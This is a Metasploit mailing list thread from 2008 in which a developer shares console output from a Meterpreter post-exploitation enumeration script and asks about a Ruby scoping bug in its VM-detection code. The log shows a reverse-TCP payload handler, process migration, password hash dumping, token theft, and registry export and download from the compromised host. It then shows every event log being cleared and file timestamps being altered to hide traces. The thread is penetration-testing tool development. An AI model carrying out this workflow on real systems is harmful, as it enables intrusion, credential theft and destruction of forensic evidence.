Metasploit mailing list archives
Script for automating Information Gathering in windows Hosts
From: carlos_perez at darkoperator.com (Carlos Perez)
Date: Mon, 22 Dec 2008 19:46:45 -0400
Finally got it to work with AutoRunScript resource> use exploit/multi/handler resource> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource> set LHOST 192.168.1.108 LHOST => 192.168.1.108 resource> set LPORT 4444 LPORT => 4444 resource> set AutoRunScript /msf3/scripts/meterpreter/winenumng.rb -r -m -c AutoRunScript => /msf3/scripts/meterpreter/winenumng.rb -r -m -c resource> exploit [*] Handler binding to LHOST 192.168.1.108 [*] Started reverse handler [*] Starting the payload handler... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Launching hidden cmd.exe... [*] Process 3672 created. [*] Current process is grinder.exe (1988). Migrating to 3672. [*] Migration completed successfully. [*] New server process: cmd.exe (3672) [*] Running Windows Local Enumerion Meterpreter Script by Darkoperator [*] New session on 192.168.1.147:1079... [*] Saving report to /tmp/192.168.1.147_20081222.441181627 [*] Checking if WIN2K301 is a Virtual Machine ........ [*] This is a VMware Workstation/Fusion Virtual Machine [*] This is a VMWare virtual Machine [*] Running Command List ... [*] running command cmd.exe /c set [*] running command arp -a [*] running command ipconfig /all [*] running command ipconfig /displaydns [*] running command route print [*] running command net view [*] running command netstat -na [*] running command netstat -ns [*] running command net share [*] running command net group [*] running command net user [*] running command net localgroup [*] running command net view /domain [*] running command netsh firewall show config [*] running command tasklist /svc [*] Running WMIC Commands .... [*] running command wimic computersystem list [*] running command wimic useraccount list [*] running command wimic group [*] running command wimic service list brief [*] running command wimic volume list brief [*] running command wimic process list brief [*] running command wimic startup list full [*] running command wimic qfe [*] Dumping password hashes... [*] Hashes Dumped [*] Getting Tokens... [*] All tokens have been processed [*] Dumping and Downloading the Registry [*] Exporting HKCU [*] Compressing HKCU into cab file for faster download [*] Exporting HKLM [*] Compressing HKLM into cab file for faster download [*] Exporting HKCC [*] Compressing HKCC into cab file for faster download [*] Exporting HKCR [*] Compressing HKCR into cab file for faster download [*] Exporting HKU [*] Compressing HKU into cab file for faster download [*] Downloading HKCU.cab to -> /tmp/192.168.1.147-HKCU.cab [*] Downloading HKLM.cab to -> /tmp/192.168.1.147-HKLM.cab [*] Downloading HKCC.cab to -> /tmp/192.168.1.147-HKCC.cab [*] Downloading HKCR.cab to -> /tmp/192.168.1.147-HKCR.cab [*] Downloading HKU.cab to -> /tmp/192.168.1.147-HKU.cab [*] Deleting left over files [*] Clearing Event Logs, this will leave and event 517 [*] Clearing the security Event Log [*] Clearing the system Event Log [*] Clearing the application Event Log [*] Clearing the directory service Event Log [*] Clearing the dns server Event Log [*] Clearing the file replication service Event Log [*] Alll Event Logs have been cleared [*] Changing Access Time, Modified Time and Created Time of Files Used [*] Changing file MACE attributes on C:\WINDOWS\system32\cmd.exe [*] Changing file MACE attributes on C:\WINDOWS\system32\reg.exe [*] Changing file MACE attributes on C:\WINDOWS\system32\ipconfig.exe [*] Changing file MACE attributes on C:\WINDOWS\system32\route.exe [*] Changing file MACE attributes on C:\WINDOWS\system32\net.exe [*] Changing file MACE attributes on C:\WINDOWS\system32\netstat.exe [*] Changing file MACE attributes on C:\WINDOWS\system32\netsh.exe [*] Changing file MACE attributes on C:\WINDOWS\system32\makecab.exe [*] Changing file MACE attributes on C:\WINDOWS\system32\tasklist.exe [*] Changing file MACE attributes on C:\WINDOWS\system32\wbem\wmic.exe [*] Done! [*] Meterpreter session 1 opened (192.168.1.108:4444 -> 192.168.1.147:1079) meterpreter > On Sun, Dec 14, 2008 at 10:56 PM, Carlos Perez < carlos_perez at darkoperator.com> wrote:
forgot to include the mailing list address on this one to. As you guys can see my problem with AutoRunScript is when I have the code inside a module vs not in a module. Any ideas on how to fix this in the code or is it a bug in Metasploit? ---------- Forwarded message ---------- From: Carlos Perez <carlos_perez at darkoperator.com> Date: Sun, Dec 14, 2008 at 7:07 PM Subject: Re: [framework] Script for automating Information Gathering in windows Hosts To: Jerome Athias <jerome.athias at free.fr> Thanks Jerome, the problem with the AutoRunScript appears to be when I have the instructions in a Module. Example: --------------------------------------------- works ---------------------------------------------------------- vmout = '' info = client.sys.config.sysinfo print_status "Checking if #{info['Computer']} is a Virtual Machine ........" # Check for Windows 2003 Machines if running in VMware Workstation/Fusion begin key = 'HKLM\\HARDWARE\\DESCRIPTION\\System\\BIOS' root_key, base_key = client.sys.registry.splitkey(key) open_key = client.sys.registry.open_key(root_key,base_key,KEY_READ) v = open_key.query_value('SystemManufacturer') if v.data == 'VMware, Inc.' print_status "\tThis is a VMware Workstation/Fusion Virtual Machine" vmout << "This is a VMware Workstation/Fusion Virtual Machine\n\n" end rescue end #Registry path using the HD and CD rom entries in the registry in case propirtary tools are #not installed. key = "HKLM\\HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0" root_key, base_key = client.sys.registry.splitkey(key) open_key = client.sys.registry.open_key(root_key,base_key,KEY_READ) v = open_key.query_value('Identifier') if v.data.downcase.grep("vmware") print_status "\tThis is a VMWare virtual Machine" vmout << "This is a VMWare virtual Machine\n\n" elsif v.data.downcase.grep("vbox") print_status "\tThis is a Sun VirtualBox virtual Machine" vmout << "This is a Sun VirtualBox virtual Machine\n\n" end puts vmout ---------------------------------------------------------------------------------------------------------- if I place this inside a def vmcheck() .............. end it fails with: [12/14/2008 19:11:12] [e(0)] core: Exception raised from handle_connection: undefined local variable or method `client' for #<#<Class:0xb6545ba8>:0xb6b3188c> /pentest/exploits/framework3/lib/rex/script.rb:35:in `eval' (eval):141:in `on_session' (eval):88:in `on_session' /pentest/exploits/framework3/lib/msf/core/handler.rb:202:in `create_session' /pentest/exploits/framework3/lib/msf/core/payload/stager.rb:128:in `handle_connection_stage' /pentest/exploits/framework3/lib/msf/core/payload/windows/dllinject.rb:231:in `handle_connection_stage' /pentest/exploits/framework3/lib/msf/core/payload/stager.rb:119:in `handle_connection' /pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:129:in `start_handler' /pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:127:in `initialize' /pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:127:in `new' /pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:127:in `start_handler' /pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:107:in `initialize' /pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:107:in `new' /pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:107:in `start_handler' /pentest/exploits/framework3/lib/msf/core/exploit.rb:401:in `setup' /pentest/exploits/framework3/lib/msf/core/exploit_driver.rb:173:in `job_run_proc' /pentest/exploits/framework3/lib/msf/core/exploit_driver.rb:144:in `run' /pentest/exploits/framework3/lib/msf/base/simple/exploit.rb:121:in `exploit_simple' /pentest/exploits/framework3/lib/msf/base/simple/exploit.rb:142:in `exploit_simple' /pentest/exploits/framework3/lib/msf/ui/console/command_dispatcher/exploit.rb:118:in `cmd_exploit' /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send' /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command' /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single' /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each' /pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single' /pentest/exploits/framework3/lib/rex/ui/text/shell.rb:127:in `run' ./msfconsole:78 On Sun, Dec 14, 2008 at 9:26 PM, Jerome Athias <jerome.athias at free.fr>wrote:Nice work Keep it up! /JA
-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081222/8ec006b1/attachment.htm> -------------- next part -------------- A non-text attachment was scrubbed... Name: winenum.tar.gz Type: application/x-gzip Size: 4540 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081222/8ec006b1/attachment.bin>
Current thread:
- Script for automating Information Gathering in windows Hosts Carlos Perez (Dec 14)
- Message not available
- Message not available
- Message not available
- Message not available
- Message not available
- Fwd: Script for automating Information Gathering in windows Hosts Carlos Perez (Dec 14)
- Message not available
- Message not available
- Message not available
- Fwd: Script for automating Information Gathering in windows Hosts Carlos Perez (Dec 14)
- Script for automating Information Gathering in windows Hosts Carlos Perez (Dec 22)